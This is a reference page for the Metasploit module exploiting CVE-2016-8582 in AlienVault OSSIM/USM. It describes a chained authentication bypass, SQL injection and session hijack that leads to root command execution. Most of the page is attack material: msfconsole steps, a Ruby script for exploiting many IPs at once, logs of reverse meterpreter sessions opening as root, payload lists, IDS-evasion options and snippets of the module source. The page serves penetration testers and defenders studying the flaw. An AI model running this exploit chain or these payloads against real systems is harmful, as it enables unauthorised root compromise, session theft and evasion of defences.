AlienVault OSSIM/USM Remote Code Execution - Metasploit


This page contains detailed information about how to use the exploit/linux/http/alienvault_exec metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: AlienVault OSSIM/USM Remote Code Execution
Module: exploit/linux/http/alienvault_exec
Source code: modules/exploits/linux/http/alienvault_exec.rb
Disclosure date: 2017-01-31
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): python
Supported platform(s): Python
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2016-8582

This module exploits object injection, authentication bypass and ip spoofing vulnerabilities all together. Unauthenticated users can execute arbitrary commands under the context of the root user. By abusing authentication bypass issue on gauge.php lead adversaries to exploit object injection vulnerability which leads to SQL injection attack that leaks an administrator session token. Attackers can create a rogue action and policy that enables to execute operating system commands by using captured session token. As a final step, SSH login attempt with an invalid credentials can trigger a created rogue policy which triggers an action that executes operating system command with root user privileges. This module was tested against following product and versions: AlienVault USM 5.3.0, 5.2.5, 5.0.0, 4.15.11, 4.5.0 AlienVault OSSIM 5.0.0, 4.6.1

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


Using alienvault_exec against a single host

Normally, you can use exploit/linux/http/alienvault_exec this way:

msf > use exploit/linux/http/alienvault_exec
msf exploit(alienvault_exec) > show targets
    ... a list of targets ...
msf exploit(alienvault_exec) > set TARGET target-id
msf exploit(alienvault_exec) > show options
    ... show and set options ...
msf exploit(alienvault_exec) > exploit

Using alienvault_exec against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your alienvault_exec will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/linux/http/alienvault_exec")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Vulnerable Application


This module exploits object injection, authentication bypass and ip spoofing vulnerabities all together. Unauthenticated users can execute arbitrary commands under the context of the root user.

By abusing authentication bypass issue on gauge.php lead adversaries to exploit object injection vulnerability which leads to SQL injection attack that leaks an administrator session token. Attackers can create a rogue action and policy that enables to execute operating system commands by using captured session token. As a final step, SSH login attempt with a invalid credentials can trigger a created rogue policy which triggers an action that executes operating system command with root user privileges.

This module was tested against AlienVault USM 5.2.5.

Vulnerable Application Installation Steps

Major version of older releases can be found at following URL. http://downloads.eu.alienvault.com/c/download

You can download file named as AlienVault-USM_trial_5.2.5.zip which contains a OVA file. In order to complete installation phase, you have to apply https://www.alienvault.com/try-it-free . Once alienvault sales team validate your information, you will be able to complete the installation with your e-mail address.

Verification Steps


A successful check of the exploit will look like this:

msf > use exploit/linux/http/alienvault_exec 
msf exploit(alienvault_exec) > set RHOST 12.0.0.137
RHOST => 12.0.0.137
msf exploit(alienvault_exec) > set LHOST 12.0.0.1 
LHOST => 12.0.0.1
msf exploit(alienvault_exec) > check
[+] 12.0.0.137:443 The target is vulnerable.
msf exploit(alienvault_exec) > exploit 

[*] Started reverse TCP handler on 12.0.0.1:4445 
[*] Hijacking administrator session
[+] Admin session token : PHPSESSID=2gbhp8j5f2af0vu5es5t3083q4
[*] Creating rogue action
[+] Action created: aWbhnZFHqYbUbNW
[*] Retrieving rogue action id
[+] Corresponding Action ID found: D62A1D4A6D3AEEA65F99B606B02197A1
[*] Retrieving policy ctx and group values
[+] CTX Value found: 5E22D6A9E79211E6B8E4000C29F647D7
[+] GROUP Value found: 00000000000000000000000000000000
[*] Creating a policy that uses our rogue action
[+] Policy created: ASdKHQOZVONGzfU
[*] Activating the policy
[+] Rogue policy activated
[*] Triggering the policy by performing SSH login attempt
[+] SSH - Failed authentication. That means our policy and action will be trigged..!
[*] Sending stage (38500 bytes) to 12.0.0.137
[*] Meterpreter session 6 opened (12.0.0.1:4445 -> 12.0.0.137:51674) at 2017-01-31 14:13:49 +0300

meterpreter > getuid
Server username: root
meterpreter >

Go back to menu.

Msfconsole Usage


Here is how the linux/http/alienvault_exec exploit module looks in the msfconsole:

msf6 > use exploit/linux/http/alienvault_exec

[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(linux/http/alienvault_exec) > show info

       Name: AlienVault OSSIM/USM Remote Code Execution
     Module: exploit/linux/http/alienvault_exec
   Platform: Python
       Arch: python
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2017-01-31

Provided by:
  Peter Lapp
  Mehmet Ince <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Alienvault USM/OSSIM <= 5.3.0

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      443              yes       The target port (TCP)
  SSL        true             no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       The URI of the vulnerable Alienvault OSSIM instance
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits object injection, authentication bypass and ip 
  spoofing vulnerabilities all together. Unauthenticated users can 
  execute arbitrary commands under the context of the root user. By 
  abusing authentication bypass issue on gauge.php lead adversaries to 
  exploit object injection vulnerability which leads to SQL injection 
  attack that leaks an administrator session token. Attackers can 
  create a rogue action and policy that enables to execute operating 
  system commands by using captured session token. As a final step, 
  SSH login attempt with an invalid credentials can trigger a created 
  rogue policy which triggers an action that executes operating system 
  command with root user privileges. This module was tested against 
  following product and versions: AlienVault USM 5.3.0, 5.2.5, 5.0.0, 
  4.15.11, 4.5.0 AlienVault OSSIM 5.0.0, 4.6.1

References:
  https://nvd.nist.gov/vuln/detail/CVE-2016-8582
  https://pentest.blog/unexpected-journey-into-the-alienvault-ossimusm-during-engagement/
  https://www.exploit-db.com/exploits/40682

Module Options


This is a complete list of options available in the linux/http/alienvault_exec exploit:

msf6 exploit(linux/http/alienvault_exec) > show options

Module options (exploit/linux/http/alienvault_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      443              yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The URI of the vulnerable Alienvault OSSIM instance
   VHOST                       no        HTTP server virtual host

Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Alienvault USM/OSSIM <= 5.3.0

Advanced Options


Here is a complete list of advanced options supported by the linux/http/alienvault_exec exploit:

msf6 exploit(linux/http/alienvault_exec) > show advanced

Module advanced options (exploit/linux/http/alienvault_exec):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                no        The HTTP username to specify for authentication
   SSH_DEBUG               false                                               no        Enable output of SSH protocol debugging information
   SSH_IDENT               SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3             yes       SSH client identification string
   SSH_TIMEOUT             10                                                  no        Maximum SSH negotiation/authentication time in seconds
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WfsDelay                10                                                  no        Additional delay in seconds to wait for a session

Payload advanced options (python/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   HttpCookie                                    no        An optional value to use for the Cookie HTTP header
   HttpHostHeader                                no        An optional value to use for the Host HTTP header
   HttpReferer                                   no        An optional value to use for the Referer HTTP header
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   MeterpreterTryToFork         true             no        Fork a new process if the functionality is available
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   PythonMeterpreterDebug       false            no        Enable debugging for the Python meterpreter
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/http/alienvault_exec module can exploit:

msf6 exploit(linux/http/alienvault_exec) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Alienvault USM/OSSIM <= 5.3.0

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/http/alienvault_exec exploit:

msf6 exploit(linux/http/alienvault_exec) > show payloads

Compatible Payloads
===================

   #   Name                                         Disclosure Date  Rank    Check  Description
   -   ----                                         ---------------  ----    -----  -----------
   0   payload/generic/custom                                        normal  No     Custom Payload
   1   payload/generic/shell_bind_tcp                                normal  No     Generic Command Shell, Bind TCP Inline
   2   payload/generic/shell_reverse_tcp                             normal  No     Generic Command Shell, Reverse TCP Inline
   3   payload/multi/meterpreter/reverse_http                        normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
   4   payload/multi/meterpreter/reverse_https                       normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)
   5   payload/python/meterpreter/bind_tcp                           normal  No     Python Meterpreter, Python Bind TCP Stager
   6   payload/python/meterpreter/bind_tcp_uuid                      normal  No     Python Meterpreter, Python Bind TCP Stager with UUID Support
   7   payload/python/meterpreter/reverse_http                       normal  No     Python Meterpreter, Python Reverse HTTP Stager
   8   payload/python/meterpreter/reverse_https                      normal  No     Python Meterpreter, Python Reverse HTTPS Stager
   9   payload/python/meterpreter/reverse_tcp                        normal  No     Python Meterpreter, Python Reverse TCP Stager
   10  payload/python/meterpreter/reverse_tcp_ssl                    normal  No     Python Meterpreter, Python Reverse TCP SSL Stager
   11  payload/python/meterpreter/reverse_tcp_uuid                   normal  No     Python Meterpreter, Python Reverse TCP Stager with UUID Support
   12  payload/python/meterpreter_bind_tcp                           normal  No     Python Meterpreter Shell, Bind TCP Inline
   13  payload/python/meterpreter_reverse_http                       normal  No     Python Meterpreter Shell, Reverse HTTP Inline
   14  payload/python/meterpreter_reverse_https                      normal  No     Python Meterpreter Shell, Reverse HTTPS Inline
   15  payload/python/meterpreter_reverse_tcp                        normal  No     Python Meterpreter Shell, Reverse TCP Inline
   16  payload/python/pingback_bind_tcp                              normal  No     Python Pingback, Bind TCP (via python)
   17  payload/python/pingback_reverse_tcp                           normal  No     Python Pingback, Reverse TCP (via python)
   18  payload/python/shell_bind_tcp                                 normal  No     Command Shell, Bind TCP (via python)
   19  payload/python/shell_reverse_tcp                              normal  No     Command Shell, Reverse TCP (via python)
   20  payload/python/shell_reverse_tcp_ssl                          normal  No     Command Shell, Reverse TCP SSL (via python)
   21  payload/python/shell_reverse_udp                              normal  No     Command Shell, Reverse UDP (via python)

Evasion Options


Here is the full list of possible evasion options supported by the linux/http/alienvault_exec exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/http/alienvault_exec) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Session table is empty. Wait until someone logged in and try again


Here is a relevant code snippet related to the "Session table is empty. Wait until someone logged in and try again" error message:

116:	    if res && res.code == 200 && res.body =~ /XPATH syntax error: ':::(.*):::'/
117:	      admin_session = $1
118:	      cookie = "PHPSESSID=#{admin_session}"
119:	      print_good("Admin session token : #{cookie}")
120:	    else
121:	      fail_with(Failure::Unknown, "Session table is empty. Wait until someone logged in and try again")
122:	    end
123:	
124:	    # Creating a Action that contains payload.
125:	    print_status("Creating rogue action")
126:	    r = rand_text_alpha(15)

Unable to create action


Here is a relevant code snippet related to the "Unable to create action" error message:

154:	    })
155:	
156:	    if res && res.code == 200 && res.body.include?("Action successfully updated")
157:	      print_good("Action created: #{r}")
158:	    else
159:	      fail_with(Failure::Unknown, "Unable to create action")
160:	    end
161:	
162:	    # Retrieving the policy id. Authentication Bypass with User-Agent Doesn't work for this endpoint.
163:	    # Thus we're using hijacked administrator session.
164:	    print_status("Retrieving rogue action id")

Unable to retrieve action id


Here is a relevant code snippet related to the "Unable to retrieve action id" error message:

178:	
179:	    if res && res.code == 200 && res.body =~ /actionform\.php\?id=(.*)'>#{r}<\/a>/
180:	      action_id = $1
181:	      print_good("Corresponding Action ID found: #{action_id}")
182:	    else
183:	      fail_with(Failure::Unknown, "Unable to retrieve action id")
184:	    end
185:	
186:	    # Retrieving the policy data. We will use it while creating policy
187:	    print_status("Retrieving policy ctx and group values")
188:	

Unable to retrieve policy data


Here is a relevant code snippet related to the "Unable to retrieve policy data" error message:

204:	      policy_ctx = $1
205:	      policy_group = $2
206:	      print_good("CTX Value found: #{policy_ctx}")
207:	      print_good("GROUP Value found: #{policy_group}")
208:	    else
209:	      fail_with(Failure::Unknown, "Unable to retrieve policy data")
210:	    end
211:	
212:	    # Creating policy that will be trigerred when SSH authentication failed due to wrong password.
213:	    print_status("Creating a policy that uses our rogue action")
214:	    policy = rand_text_alpha(15)

Unable to create policy id


Here is a relevant code snippet related to the "Unable to create policy id" error message:

267:	      })
268:	
269:	    if res && res.code == 200
270:	      print_good("Policy created: #{policy}")
271:	    else
272:	      fail_with(Failure::Unknown, "Unable to create policy id")
273:	    end
274:	
275:	    # We gotta reload all policies in order to make our rogue one enabled.
276:	    print_status("Activating the policy")
277:	

<PEER> - Unable to enable rogue policy


Here is a relevant code snippet related to the "<PEER> - Unable to enable rogue policy" error message:

289:	    })
290:	
291:	    if res && res.code == 200
292:	      print_good("Rogue policy activated")
293:	    else
294:	      fail_with(Failure::Unknown, "#{peer} - Unable to enable rogue policy")
295:	    end
296:	
297:	    # We will trigger the rogue policy by doing ssh auth attempt with invalid credential :-)
298:	    factory = ssh_socket_factory
299:	    opts = {

SSH Error: <E.CLASS> : <E.MESSAGE>


Here is a relevant code snippet related to the "SSH Error: <E.CLASS> : <E.MESSAGE>" error message:

311:	    begin
312:	      Net::SSH.start(rhost, "root", opts)
313:	    rescue Net::SSH::AuthenticationFailed
314:	      print_good("SSH - Failed authentication. That means our policy and action will be trigged..!")
315:	    rescue Net::SSH::Exception => e
316:	      print_error("SSH Error: #{e.class} : #{e.message}")
317:	      return nil
318:	    end
319:	
320:	  end
321:	end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.